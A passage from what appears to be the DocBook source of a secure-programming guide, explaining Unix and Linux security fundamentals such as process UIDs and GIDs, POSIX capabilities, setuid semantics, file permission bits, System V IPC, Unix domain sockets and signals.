programs that implement the lower-level functions traditionally implemented
|
||
by the kernel.
|
||
</para>
|
||
|
||
<para>
|
||
Some Unix-like systems have been extensively modified to support
|
||
strong security, in particular to support U.S. Department of Defense
|
||
requirements for Mandatory Access Control (level B1 or higher).
|
||
This version of this book doesn't cover these systems or issues;
|
||
I hope to expand to that in a future version.
|
||
More detailed information on some of them is available elsewhere, for
|
||
example, details on SGI's ``Trusted IRIX/B''
|
||
are available in NSA's
|
||
<ulink url="http://www.radium.ncsc.mil/tpep/library/fers/index.html">Final
|
||
Evaluation Reports (FERs)</ulink>.
|
||
<!-- ???: Mention trusted Unix-like systems, MAC, ACLs, Trusted Solaris -->
|
||
</para>
|
||
|
||
<para>
|
||
When users log in, their usernames are mapped to integers marking their
|
||
``UID'' (for ``user id'') and the ``GID''s (for ``group id'') that they
|
||
are a member of.
|
||
UID 0 is a special privileged user (role) traditionally called ``root'';
|
||
on most Unix-like systems (including Unix) root
|
||
can overrule most security checks and is used to administrate the system.
|
||
On some Unix systems, GID 0 is also special and permits unrestricted access
|
||
to resources at the group level [Gay 2000, 228];
|
||
this isn't true on other systems (such as Linux), but even in those systems
|
||
group 0 is essentially all-powerful because so many special system files
|
||
are owned by group 0.
|
||
Processes are the only ``subjects'' in terms of security (that is, only
|
||
processes are active objects).
|
||
Processes can access various data objects, in particular filesystem
|
||
objects (FSOs), System V Interprocess Communication (IPC) objects, and
|
||
network ports.
|
||
Processes can also set signals.
|
||
Other security-relevant topics include quotas and limits, libraries,
|
||
auditing, and PAM.
|
||
The next few subsections detail this.
|
||
</para>
|
||
|
||
<sect1 id="processes">
|
||
<title>Processes</title>
|
||
|
||
<para>
|
||
In Unix-like systems,
|
||
user-level activities are implemented by running processes.
|
||
Most Unix systems support a ``thread'' as a separate concept;
|
||
threads share memory inside a process, and the system scheduler actually
|
||
schedules threads.
|
||
Linux does this differently (and in my opinion uses a better approach):
|
||
there is no essential difference between a thread and a process.
|
||
Instead, in Linux, when a process creates another process it can choose
|
||
what resources are shared (e.g., memory can be shared).
|
||
The Linux kernel then performs optimizations to get thread-level speeds;
|
||
see clone(2) for more information.
|
||
It's worth noting that the Linux kernel developers tend to use the
|
||
word ``task'', not ``thread'' or ``process'', but the external
|
||
documentation tends to use the word process
|
||
(so I'll use the term ``process'' here).
|
||
When programming a multi-threaded application,
|
||
it's usually better to use one of the standard
|
||
thread libraries that hide these differences.
|
||
Not only does this make threading more portable, but some libraries
|
||
provide an additional level of indirection, by implementing more than
|
||
one application-level thread as a single operating system thread;
|
||
this can provide some improved performance on some systems for
|
||
some applications.
|
||
</para>
|
||
|
||
<sect2 id="process-attributes">
|
||
<title>Process Attributes</title>
|
||
|
||
<para>
|
||
Here are typical attributes associated with each process in a
|
||
Unix-like system:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
RUID, RGID - real UID and GID
|
||
of the user on whose behalf the process is running
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
EUID, EGID - effective UID and GID
|
||
used for privilege checks (except for the filesystem)
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
SUID, SGID - Saved UID and GID;
|
||
used to support switching permissions ``on and off'' as discussed below.
|
||
Not all Unix-like systems support this, but the vast majority do
|
||
(including Linux and Solaris);
|
||
if you want to check if a given system implements this option in the
|
||
POSIX standard, you can use sysconf(2) to determine if
|
||
_POSIX_SAVED_IDS is in effect.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
supplemental groups - a list of groups (GIDs) in which this
|
||
user has membership.
|
||
In the original version 7 Unix, this didn't exist -
|
||
processes were only a member of one group at a time, and a special
|
||
command had to be executed to change that group.
|
||
BSD added support for a list of groups in each process,
|
||
which is more flexible, and
|
||
this addition is now widely implemented (including by Linux and Solaris).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
umask - a set of bits determining the default access control settings
|
||
when a new filesystem object is created; see umask(2).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
scheduling parameters - each process has a scheduling policy, and those
|
||
with the default policy SCHED_OTHER have the additional parameters
|
||
nice, priority, and counter. See sched_setscheduler(2) for more information.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
limits - per-process resource limits (see below).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
filesystem root - the process' idea of where the root filesystem
|
||
("/") begins; see chroot(2).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Here are less-common attributes associated with processes:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
FSUID, FSGID - UID and GID used for filesystem access checks;
|
||
this is usually equal to the EUID and EGID respectively.
|
||
This is a Linux-unique attribute.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
capabilities - POSIX capability information; there are actually three
|
||
sets of capabilities on a process: the effective, inheritable, and permitted
|
||
capabilities. See below for more information on POSIX capabilities.
|
||
Linux kernel version 2.2 and greater support this; some other Unix-like
|
||
systems do too, but it's not as widespread.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
In Linux,
|
||
if you really need to know exactly what attributes are associated
|
||
with each process, the most definitive source is the
|
||
Linux source code, in particular
|
||
<filename>/usr/include/linux/sched.h</filename>'s definition of task_struct.
|
||
</para>
|
||
|
||
<para>
|
||
The portable way to create new processes it use the fork(2) call.
|
||
BSD introduced a variant called vfork(2) as an optimization technique.
|
||
The bottom line with vfork(2) is simple: <emphasis remap="it">don't</emphasis> use it if you
|
||
can avoid it.
|
||
See <xref linkend="avoid-vfork"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
Linux supports the Linux-unique clone(2) call.
|
||
This call works like fork(2), but allows specification of which resources
|
||
should be shared (e.g., memory, file descriptors, etc.).
|
||
Various BSD systems implement an rfork() system call
|
||
(originally developed in Plan9); it has different
|
||
semantics but the same general idea (it also creates a process with tighter
|
||
control over what is shared).
|
||
<!-- For more on a vulnerability in old versions of rfork
|
||
(setuid/setgid programs could be controlled), see
|
||
http://www.openbsd.org/advisories/rfork.txt -->
|
||
Portable programs shouldn't use these calls directly, if possible;
|
||
as noted earlier,
|
||
they should instead rely on threading libraries that use such
|
||
calls to implement threads.
|
||
</para>
|
||
|
||
<para>
|
||
This book is not a full tutorial on writing programs, so
|
||
I will skip widely-available information handling processes.
|
||
You can see the documentation for wait(2), exit(2), and so on for more
|
||
information.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="posix-capabilities">
|
||
<title>POSIX Capabilities</title>
|
||
|
||
<para>
|
||
POSIX capabilities are sets of bits that permit splitting of the privileges
|
||
typically held by root into a larger set of more specific privileges.
|
||
POSIX capabilities are defined
|
||
by a draft IEEE standard; they're not unique to Linux but they're not
|
||
universally supported by other Unix-like systems either.
|
||
Linux kernel 2.0 did not support POSIX capabilities, while version 2.2
|
||
added support for POSIX capabilities to processes.
|
||
When Linux documentation (including this one)
|
||
says ``requires root privilege'', in nearly all cases it
|
||
really means ``requires a capability'' as documented in the capability
|
||
documentation.
|
||
If you need to know the specific capability required, look it up in the
|
||
capability documentation.
|
||
</para>
|
||
|
||
<para>
|
||
In Linux,
|
||
the eventual intent is to permit capabilities to be attached to files
|
||
in the filesystem; as of this writing, however, this is not yet supported.
|
||
There is support for transferring capabilities, but this is disabled
|
||
by default.
|
||
Linux version 2.2.11 added a feature that makes capabilities
|
||
more directly useful, called the ``capability bounding set''.
|
||
The capability bounding set is a list of capabilities
|
||
that are allowed to be held by any process on the system (otherwise,
|
||
only the special init process can hold it).
|
||
If a capability does not appear in the bounding set, it may not be
|
||
exercised by any process, no matter how privileged.
|
||
This feature can be used to, for example, disable kernel module loading.
|
||
A sample tool that takes advantage of this is LCAP at
|
||
<ulink
|
||
url="http://pweb.netcom.com/~spoon/lcap/">http://pweb.netcom.com/~spoon/lcap/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
More information about POSIX capabilities is available at
|
||
<ulink
|
||
url="ftp://linux.kernel.org/pub/linux/libs/security/linux-privs">ftp://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="process-creation">
|
||
<title>Process Creation and Manipulation</title>
|
||
|
||
<para>
|
||
Processes may be created using fork(2), the non-recommended vfork(2),
|
||
or the Linux-unique clone(2); all of these system calls duplicate the existing
|
||
process, creating two processes out of it.
|
||
A process can execute a different program by calling execve(2),
|
||
or various front-ends to it (for example, see exec(3), system(3), and popen(3)).
|
||
</para>
|
||
|
||
<para>
|
||
<!-- I've known about the scripting race condition since forever, but the
|
||
description here is vaguely derived from perlsec(1) -->
|
||
When a program is executed, and its file has its setuid or setgid bit set,
|
||
the process' EUID or EGID (respectively) is usually set to the file's value.
|
||
This functionality was the source of an old Unix security weakness
|
||
when used to support setuid or setgid scripts, due to a race condition.
|
||
Between the time the kernel opens the file to see which interpreter to run,
|
||
and when the (now-set-id) interpreter turns around and reopens
|
||
the file to interpret it, an attacker might change the file
|
||
(directly or via symbolic links).
|
||
</para>
|
||
|
||
<para>
|
||
Different Unix-like systems handle the security issue for setuid scripts
|
||
in different ways.
|
||
Some systems, such as Linux, completely ignore the setuid and setgid
|
||
bits when executing scripts, which is clearly a safe approach.
|
||
Most modern releases of SysVr4 and BSD 4.4 use a different approach to
|
||
avoid the kernel race condition.
|
||
On these systems, when the kernel passes
|
||
the name of the set-id script to open to the interpreter,
|
||
rather than using a pathname (which would permit the race condition)
|
||
it instead passes the filename /dev/fd/3. This is a special
|
||
file already opened on the script, so that there can be no
|
||
race condition for attackers to exploit.
|
||
Even on these systems I recommend against using the setuid/setgid
|
||
shell scripts language for secure programs, as discussed below.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
In some cases a process can affect the various UID and GID values; see
|
||
setuid(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2).
|
||
In particular the saved user id (SUID) attribute
|
||
is there to permit trusted programs to temporarily switch UIDs.
|
||
Unix-like systems supporting the SUID use the following rules:
|
||
If the RUID is changed, or the EUID is set to a value not equal to the RUID,
|
||
the SUID is set to the new EUID.
|
||
Unprivileged users can set their EUID from their SUID,
|
||
the RUID to the EUID, and the EUID to the RUID.
|
||
<!-- ??? In FreeBSD, On execve(), the saved UID is reset to the EUID.
|
||
Source: "Advanced Unix Programming", Warren W. Gay, page 231. -->
|
||
</para>
|
||
|
||
<para>
|
||
The Linux-unique
|
||
FSUID process attribute is intended to permit programs like the NFS server
|
||
to limit themselves to only the filesystem rights of some given UID
|
||
without giving that UID permission to send signals to the process.
|
||
Whenever the EUID is changed, the FSUID is changed to the new
|
||
EUID value; the FSUID value can be set separately using setfsuid(2), a
|
||
Linux-unique call.
|
||
Note that non-root callers can only set FSUID to the current
|
||
RUID, EUID, SEUID, or current FSUID values.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="files">
|
||
<title>Files</title>
|
||
|
||
<para>
|
||
On all Unix-like systems, the primary repository of information is
|
||
the file tree, rooted at ``/''.
|
||
The file tree is a hierarchical set of directories, each of which
|
||
may contain filesystem objects (FSOs).
|
||
</para>
|
||
|
||
<para>
|
||
In Linux,
|
||
filesystem objects (FSOs) may be ordinary files, directories,
|
||
symbolic links, named pipes (also called first-in first-outs or FIFOs),
|
||
sockets (see below),
|
||
character special (device) files, or block special (device) files
|
||
(in Linux, this list is given in the find(1) command).
|
||
Other Unix-like systems have an identical or similar list of FSO types.
|
||
</para>
|
||
|
||
<para>
|
||
Filesystem objects are collected on filesystems, which can be
|
||
mounted and unmounted on directories in the file tree.
|
||
A filesystem type (e.g., ext2 and FAT) is a specific set of conventions
|
||
for arranging data on the disk to optimize speed, reliability, and so on;
|
||
many people use the term ``filesystem'' as a synonym for the filesystem type.
|
||
</para>
|
||
|
||
<sect2 id="fso-attributes">
|
||
<title>Filesystem Object Attributes</title>
|
||
|
||
<para>
|
||
Different Unix-like systems support different filesystem types.
|
||
Filesystems may have slightly different sets of access control attributes
|
||
and access controls can be affected by options selected at mount time.
|
||
On Linux, the ext2 filesystems is currently the most popular filesystem,
|
||
but Linux supports a vast number of filesystems.
|
||
Most Unix-like systems tend to support multiple filesystems too.
|
||
</para>
|
||
|
||
<para>
|
||
Most filesystems on Unix-like systems store at least the following:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
owning UID and GID - identifies the ``owner'' of the filesystem
|
||
object. Only the owner or root can change the access control attributes
|
||
unless otherwise noted.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
permission bits -
|
||
read, write, execute bits for each of user (owner), group, and other.
|
||
For ordinary files, read, write, and execute have their typical meanings.
|
||
In directories, the ``read'' permission is necessary to display a directory's
|
||
contents, while the ``execute'' permission is sometimes called ``search''
|
||
permission and is necessary to actually enter the directory to use its contents.
|
||
In a directory ``write'' permission on a directory permits
|
||
adding, removing, and renaming files in that directory; if you only want
|
||
to permit adding, set the sticky bit noted below.
|
||
Note that the permission values of symbolic links are never used; it's only
|
||
the values of their containing directories and the linked-to file that matter.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
``sticky'' bit - when set on a directory, unlinks (removes) and
|
||
renames of files in that directory are limited to
|
||
the file owner, the directory owner, or root privileges.
|
||
This is a very common Unix extension
|
||
and is specified in the
|
||
Open Group's Single Unix Specification version 2.
|
||
<!-- http://www.opengroup.org/onlinepubs/007908799/xsh/chmod.html -->
|
||
Old versions of Unix called this the ``save program text'' bit and used this
|
||
to indicate executable files that should stay in memory.
|
||
Systems that did this ensured that only root could set this bit
|
||
(otherwise users could have crashed systems by forcing ``everything''
|
||
into memory).
|
||
In Linux, this bit has no effect on ordinary files and ordinary users
|
||
can modify this bit on the files they own:
|
||
Linux's virtual memory management makes this old use irrelevant.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
setuid, setgid - when set on an executable file,
|
||
executing the file will set the process' effective UID or effective GID
|
||
to the value of the file's owning UID or GID (respectively).
|
||
All Unix-like systems support this.
|
||
In Linux and System V systems,
|
||
when setgid is set on a file that does not have any execute privileges,
|
||
this indicates a file that is subject to mandatory locking
|
||
during access (if the filesystem is mounted to support mandatory locking);
|
||
this overload of meaning surprises many and is not universal across Unix-like
|
||
systems.
|
||
In fact, the Open Group's Single Unix Specification version 2 for chmod(3)
|
||
permits systems to ignore
|
||
requests to turn on setgid for files that aren't executable if such
|
||
a setting has no meaning.
|
||
In Linux and Solaris,
|
||
when setgid is set on a directory, files created in the directory will
|
||
have their GID automatically reset to that of the directory's GID.
|
||
The purpose of this approach is to support ``project directories'':
|
||
users can save files into such specially-set directories and the group
|
||
owner automatically changes.
|
||
However, setting the setgid bit on directories is not specified by
|
||
standards such as the Single Unix Specification
|
||
[Open Group 1997].
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
timestamps - access and modification times are stored for each
|
||
filesystem object. However, the owner is allowed to set these values
|
||
arbitrarily (see touch(1)), so be careful about trusting this information.
|
||
All Unix-like systems support this.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
The following attributes are Linux-unique extensions on the ext2
|
||
filesystem, though many other filesystems have similar functionality:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
immutable bit - no changes to the filesystem object are allowed;
|
||
only root can set or clear this bit.
|
||
This is only supported by ext2 and is not portable across all Unix
|
||
systems (or even all Linux filesystems).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
append-only bit - only appending to the filesystem object are allowed;
|
||
only root can set or clear this bit.
|
||
This is only supported by ext2 and is not portable across all Unix
|
||
systems (or even all Linux filesystems).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Other common extensions include some sort of bit indicating ``cannot
|
||
delete this file''.
|
||
</para>
|
||
|
||
<para>
|
||
Many of these values can be influenced at mount time, so that, for example,
|
||
certain bits can be treated as though they had a certain value (regardless
|
||
of their values on the media).
|
||
See mount(1) for more information about this.
|
||
These bits are useful, but be aware that some of these are intended to
|
||
simplify ease-of-use and aren't really sufficient to prevent certain actions.
|
||
For example, on Linux, mounting with ``noexec'' will disable execution of
|
||
programs on that file system; as noted in the manual, it's
|
||
intended for mounting filesystems containing binaries for incompatible systems.
|
||
On Linux,
|
||
this option won't completely prevent someone from running the files;
|
||
they can copy the files somewhere else to run them, or even use the
|
||
command ``/lib/ld-linux.so.2'' to run the file directly.
|
||
</para>
|
||
|
||
<para>
|
||
Some filesystems don't support some of these access control values; again,
|
||
see mount(1) for how these filesystems are handled.
|
||
In particular, many Unix-like systems support MS-DOS disks, which by
|
||
default support very few of these attributes (and there's not standard
|
||
way to define these attributes).
|
||
In that case, Unix-like systems emulate the standard attributes
|
||
(possibly implementing them through special on-disk files), and these
|
||
attributes are generally influenced by the mount(1) command.
|
||
</para>
|
||
|
||
<para>
|
||
It's important to note that, for adding and removing files, only the
|
||
permission bits and owner of the file's <emphasis>directory</emphasis>
|
||
really matter unless the Unix-like system supports
|
||
more complex schemes (such as POSIX ACLs).
|
||
Unless the system has other extensions, and stock Linux 2.2 doesn't,
|
||
a file that has no permissions in its permission bits
|
||
can still be removed if its containing directory permits it.
|
||
Also, if an ancestor directory permits its children to be changed by some
|
||
user or group, then any of that directory's descendants can be replaced by
|
||
that user or group.
|
||
</para>
|
||
|
||
<para>
|
||
The draft IEEE POSIX standard on security defines a technique for
|
||
true ACLs that support a list of users and groups with their permissions.
|
||
Unfortunately, this is not widely supported nor supported exactly the
|
||
same way across Unix-like systems.
|
||
Stock Linux 2.2, for example, has neither ACLs nor POSIX capability
|
||
values in the filesystem.
|
||
</para>
|
||
|
||
<para>
|
||
It's worth noting that in Linux, the Linux ext2
|
||
filesystem by default reserves a small amount of space for the root user.
|
||
This is a partial defense against denial-of-service attacks; even if a user
|
||
fills a disk that is shared with the root user, the root user has a little
|
||
space left over (e.g., for critical functions).
|
||
The default is 5% of the filesystem space; see mke2fs(8),
|
||
in particular its ``-m'' option.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="fso-initial-values">
|
||
<title>Creation Time Initial Values</title>
|
||
|
||
<para>
|
||
At creation time, the following rules apply.
|
||
On most Unix systems, when a new filesystem object is created via creat(2)
|
||
or open(2), the FSO UID is set to the process' EUID and the FSO's GID is
|
||
set to the process' EGID.
|
||
Linux works slightly differently due to its FSUID
|
||
extensions; the FSO's UID is set to the process' FSUID, and the FSO GID
|
||
is set to the process' FSGUID; if the
|
||
containing directory's setgid bit is set or the filesystem's
|
||
``GRPID'' flag is set, the FSO GID is actually set to the
|
||
GID of the containing directory.
|
||
Many systems, including Sun Solaris and Linux, also support the
|
||
setgid directory extensions.
|
||
As noted earlier,
|
||
this special case supports ``project'' directories: to make a ``project''
|
||
directory, create a special group for the project,
|
||
create a directory for the project owned by that group, then make the
|
||
directory setgid: files placed there
|
||
are automatically owned by the project.
|
||
Similarly, if a new subdirectory is created inside a directory with the
|
||
setgid bit set (and the filesystem GRPID isn't set), the new subdirectory
|
||
will also have its setgid bit set (so that project subdirectories will
|
||
``do the right thing''.); in all other cases the setgid is clear for a new file.
|
||
This is the rationale for the ``user-private group'' scheme
|
||
(used by Red Hat Linux and some others).
|
||
In this scheme,
|
||
every user is a member of a ``private'' group with just themselves as members,
|
||
so their defaults can permit the group to read and write any file
|
||
(since they're the only member of the group).
|
||
Thus, when the file's group membership
|
||
is transferred this way, read and write privileges
|
||
are transferred too.
|
||
<!-- http://www.redhat.com/support/manuals/RHL-6.2-Manual/ref-guide/s1-sysadmin-usr-grps.html -->
|
||
FSO basic access control values (read, write, execute) are computed from
|
||
(requested values & ~ umask of process).
|
||
New files always start with a clear sticky bit and clear setuid bit.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="changing-acls">
|
||
<title>Changing Access Control Attributes</title>
|
||
|
||
<para>
|
||
You can set most of these values with chmod(2), fchmod(2), or chmod(1)
|
||
but see also chown(1), and chgrp(1).
|
||
In Linux, some of the Linux-unique attributes are manipulated using chattr(1).
|
||
</para>
|
||
|
||
<para>
|
||
Note that in Linux, only root can change the owner of a given file.
|
||
Some Unix-like systems allow ordinary users to transfer ownership of their
|
||
files to another, but this causes complications and is forbidden by Linux.
|
||
For example, if you're trying to limit disk usage,
|
||
allowing such operations would allow users to claim that large files
|
||
actually belonged to some other ``victim''.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="using-acls">
|
||
<title>Using Access Control Attributes</title>
|
||
|
||
<para>
|
||
Under Linux and most Unix-like systems, reading and writing
|
||
attribute values are only checked when the file is opened; they
|
||
are not re-checked on every read or write.
|
||
Still, a large number of calls do check these attributes,
|
||
since the filesystem is so central to Unix-like systems.
|
||
Calls that check these attributes
|
||
include open(2), creat(2), link(2), unlink(2), rename(2),
|
||
mknod(2), symlink(2), and socket(2).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="filesystem-hierarchy">
|
||
<title>Filesystem Hierarchy</title>
|
||
|
||
<para>
|
||
Over the years conventions have been built on ``what files to place where''.
|
||
Where possible,
|
||
please follow conventional use when placing information in the hierarchy.
|
||
For example, place global configuration information in /etc.
|
||
The Filesystem Hierarchy Standard (FHS) tries to
|
||
define these conventions in a logical manner, and is widely used by
|
||
Linux systems.
|
||
The FHS is an update to the previous
|
||
Linux Filesystem Structure standard (FSSTND), incorporating lessons
|
||
learned and approaches from Linux, BSD, and System V systems.
|
||
See <ulink
|
||
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink> for more information about the FHS.
|
||
A summary of these conventions is in hier(5) for Linux
|
||
and hier(7) for Solaris.
|
||
Sometimes different conventions disagree; where possible, make these
|
||
situations configurable at compile or installation time.
|
||
</para>
|
||
|
||
<para>
|
||
I should note that the FHS has been adopted by the
|
||
<ulink url="http://www.linuxbase.org">Linux Standard Base</ulink> which
|
||
is developing and promoting a set of standards to increase
|
||
compatibility among Linux distributions and to enable
|
||
software applications to run on any compliant Linux system.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="sysv-ipc">
|
||
<title>System V IPC</title>
|
||
|
||
<para>
|
||
Many Unix-like systems, including
|
||
Linux and System V systems, support System V interprocess communication
|
||
(IPC) objects.
|
||
Indeed System V IPC is required by the
|
||
Open Group's Single UNIX Specification, Version 2
|
||
[Open Group 1997].
|
||
<!-- ???: how about BSD variants? -->
|
||
<!-- ???: is this the same as "POSIX shm"? John Levon asked; I think
|
||
they're the same but I'm not certain. -->
|
||
System V IPC objects can be one of three kinds:
|
||
System V message queues, semaphore sets, and shared memory segments.
|
||
Each such object has the following attributes:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
read and write permissions for each of creator, creator group, and
|
||
others.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
creator UID and GID - UID and GID of the creator of the object.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
owning UID and GID - UID and GID of the owner of the
|
||
object (initially equal to the creator UID).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
When accessing such objects, the rules are as follows:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
if the process has root privileges, the access is granted.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
if the process' EUID is the owner or creator UID of the object,
|
||
then the appropriate creator permission bit is
|
||
checked to see if access is granted.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
if the process' EGID is the owner or creator GID of the object,
|
||
or one of the process' groups is the owning or creating GID of the object,
|
||
then the appropriate creator group permission bit is checked for access.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
otherwise, the appropriate ``other'' permission bit is checked
|
||
for access.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Note that root, or a process with the EUID of either the owner or creator,
|
||
can set the owning UID and owning GID and/or remove the object.
|
||
More information is available in ipc(5).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="sockets">
|
||
<title>Sockets and Network Connections</title>
|
||
|
||
<para>
|
||
<!-- Sockets are supported by System V according to Linux's socket(2) -->
|
||
Sockets are used for communication, particularly over a network.
|
||
Sockets were originally developed by the
|
||
BSD branch of Unix systems, but they are generally portable to other
|
||
Unix-like systems: Linux and System V variants support sockets as well, and
|
||
socket support is required by the Open Group's
|
||
Single Unix Specification [Open Group 1997].
|
||
System V systems traditionally used a different (incompatible) network
|
||
communication interface, but it's worth noting that systems like Solaris
|
||
include support for sockets.
|
||
Socket(2) creates an endpoint for communication and returns a descriptor,
|
||
in a manner similar to open(2) for files.
|
||
The parameters for socket specify the protocol family and type,
|
||
such as the Internet domain (TCP/IP version 4), Novell's IPX,
|
||
or the ``Unix domain''.
|
||
A server then typically calls bind(2), listen(2), and accept(2) or select(2).
|
||
A client typically calls bind(2) (though that may be omitted) and
|
||
connect(2).
|
||
See these routine's respective man pages for more information.
|
||
It can be difficult to understand how to use sockets from their man pages;
|
||
you might want to consult other papers such as
|
||
Hall "Beej" [1999]
|
||
to learn how these calls are used together.
|
||
</para>
|
||
|
||
<para>
|
||
The ``Unix domain sockets'' don't actually represent a network protocol; they
|
||
can only connect to sockets on the same machine.
|
||
(at the time of this writing for the standard Linux kernel).
|
||
When used as a stream, they are fairly similar to named pipes, but with
|
||
significant advantages.
|
||
In particular, Unix domain socket is connection-oriented; each new connection to
|
||
the socket results in a new communication channel, a very different situation
|
||
than with named pipes.
|
||
Because of this property, Unix domain sockets are often used instead of
|
||
named pipes to implement IPC for many important services.
|
||
Just like you can have unnamed pipes, you can have unnamed Unix domain sockets
|
||
using socketpair(2); unnamed Unix domain sockets
|
||
are useful for IPC in a way similar to unnamed pipes.
|
||
</para>
|
||
|
||
<para>
|
||
There are several interesting security implications of Unix domain sockets.
|
||
First, although Unix domain sockets can appear in the filesystem and can have
|
||
stat(2) applied to them, you can't use open(2) to open them (you have
|
||
to use the socket(2) and friends interface).
|
||
Second, Unix domain sockets can be used to pass
|
||
file descriptors between processes (not just the file's contents).
|
||
This odd capability, not available in any other IPC mechanism, has been used
|
||
to hack all sorts of schemes (the descriptors can basically
|
||
be used as a limited version of the
|
||
``capability'' in the computer science sense of the term).
|
||
File descriptors are sent using sendmsg(2), where the msg (message)'s
|
||
field msg_control points to an array of control message headers
|
||
(field msg_controllen must specify the number of bytes contained in the array).
|
||
Each control message is a struct cmsghdr followed by data, and for this purpose
|
||
you want the cmsg_type set to SCM_RIGHTS.
|
||
A file descriptor is retrieved through recvmsg(2) and then tracked down in
|
||
the analogous way.
|
||
Frankly, this feature is quite baroque, but it's worth knowing about.
|
||
</para>
|
||
|
||
<para>
|
||
Linux 2.2 and later
|
||
supports an additional feature in Unix domain sockets: you can
|
||
acquire the peer's ``credentials'' (the pid, uid, and gid).
|
||
Here's some sample code:
|
||
<programlisting width="61">
|
||
<![CDATA[
|
||
/* fd= file descriptor of Unix domain socket connected
|
||
to the client you wish to identify */
|
||
|
||
struct ucred cr;
|
||
int cl=sizeof(cr);
|
||
|
||
if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl)==0) {
|
||
printf("Peer's pid=%d, uid=%d, gid=%d\n",
|
||
cr.pid, cr.uid, cr.gid);
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Standard Unix convention is that binding to
|
||
TCP and UDP local port numbers less than 1024 requires
|
||
root privilege, while any process can bind to an unbound port number
|
||
of 1024 or greater.
|
||
Linux follows this convention,
|
||
more specifically, Linux requires a process to have the
|
||
capability CAP_NET_BIND_SERVICE to bind to a port number less than 1024;
|
||
this capability is normally only held by processes with an EUID of 0.
|
||
The adventurous can check this in Linux by examining its Linux's source;
|
||
in Linux 2.2.12, it's file <filename>/usr/src/linux/net/ipv4/af_inet.c</filename>,
|
||
function inet_bind().
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="signals">
|
||
<title>Signals</title>
|
||
|
||
<para>
|
||
Signals are a simple form of ``interruption'' in the Unix-like OS world,
|
||
and are an ancient part of Unix.
|
||
A process can set a ``signal'' on another process (say using
|
||
kill(1) or kill(2)), and that other process would receive and
|
||
handle the signal asynchronously.
|
||
For a process to have permission to send an arbitrary
|
||
signal to some other process,
|
||
the sending process must either have root privileges, or
|
||
the real or effective user ID of the sending process
|
||
must equal the real or saved set-user-ID of the receiving process.
|
||
However, some signals can be sent in other ways.
|
||
In particular, SIGURG can be delivered over a network through the
|
||
TCP/IP out-of-band (OOB) message.
|
||
</para>
|
||
|
||
<para>
|
||
Although signals are an ancient part of Unix, they've had different
|
||
semantics in different implementations.
|
||
Basically, they involve questions such as ``what happens when a signal
|
||
occurs while handling another signal''?
|
||
The older Linux libc 5 used a different set of semantics for some signal
|
||
operations than the newer GNU libc libraries.
|
||
Calling C library functions is often unsafe within a
|
||
signal handler, and even some system calls aren't safe;
|
||
you need to examine the documentation for each call you make to see
|
